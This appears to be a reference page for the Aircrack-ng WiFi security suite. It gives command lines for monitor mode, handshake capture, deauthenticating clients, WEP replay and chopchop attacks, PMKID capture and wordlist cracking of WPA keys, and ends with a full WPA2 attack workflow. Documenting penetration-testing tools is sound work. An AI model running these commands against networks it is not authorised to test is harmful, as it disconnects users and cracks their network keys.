Description
Aircrack-ng is a complete suite of tools for assessing WiFi network security. It focuses on monitoring (packet capture), attacking (replay attacks, deauthentication), testing (checking WiFi cards and drivers), and cracking (WEP and WPA PSK).
Installation
BASH
# Kali/Debian
sudo apt install aircrack-ng
# From source
git clone https://github.com/aircrack-ng/aircrack-ng
cd aircrack-ng
autoreconf -i
./configure
make && sudo make installBasic Usage
BASH
# Enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Scan for networks
sudo airodump-ng wlan0mon
# Capture handshake
sudo airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon
# Deauthenticate client (force handshake)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.capAdvanced Usage
BASH
# WEP cracking with ARP replay
sudo aireplay-ng -3 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
aircrack-ng wep_capture*.cap
# PMKID capture (no client needed)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 capture.pcapng
hashcat -m 22000 hash.hc22000 wordlist.txt
# Fake authentication
sudo aireplay-ng -1 0 -e <ESSID> -a <AP_MAC> -h <YOUR_MAC> wlan0mon
# Chopchop attack
sudo aireplay-ng -4 -b <AP_MAC> -h <YOUR_MAC> wlan0mon
# Custom wordlist with crunch
crunch 8 8 0123456789 | aircrack-ng -w - capture*.capCommon Workflows
BASH
# Full WPA2 attack workflow
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon # Find target
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Capture
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Deauth
aircrack-ng -w rockyou.txt capture-01.cap # Crack